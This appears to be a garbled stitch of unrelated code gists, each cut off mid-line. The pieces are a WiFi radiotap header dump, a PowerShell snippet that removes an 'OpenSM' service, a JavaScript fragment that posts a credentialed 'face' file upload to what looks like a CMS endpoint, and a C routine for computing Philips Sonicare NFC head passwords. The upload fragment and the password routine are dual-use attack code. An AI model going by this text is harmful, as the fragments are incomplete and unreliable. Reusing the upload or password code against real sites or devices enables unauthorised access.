The dongle itself is sending out data using 802.11a (5 GHz WiFi) with OFDM and 6 Mbit/s data rate:
Radiotap Header v0, Length 38
Header revision: 0
Header pad: 0
Header length: 38
Present flags
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# Check if we have OpenSM service | |
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Get-Service op* | |
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# If it's present and running, stop and remove this service. | |
# There's Remove-Service available with PowerShell 6.0, which you likely don't have. | |
# Use sc.exe delete OpenSM or command below | |
# | |
Stop-Service 'OpenSM'; Get-CimInstance -ClassName Win32_Service -Filter "Name='OpenSM'" | Remove-CimInstance |
var input= document.createElement("input"); | |
input.type="file"; | |
input.onchange=function(){ | |
if(input.files.length>0){ | |
var data= new FormData(); | |
data.append("dopost","save"); | |
data.append("Displayrank","10000"); | |
data.append("face",input.files[0]); | |
var xhr = new XMLHttpRequest(); | |
xhr.withCredentials = true; |
#include <stdio.h> | |
#include <stdint.h> | |
// Philips Sonicare NFC Head Password calculation by @atc1441 Video manual: https://www.youtube.com/watch?v=EPytrn8i8sc | |
uint16_t CRC16(uint16_t crc, uint8_t *buffer, int len) // Default CRC16 Algo | |
{ | |
while(len--) | |
{ | |
crc ^= *buffer++ << 8; | |
int bits = 0; | |
do |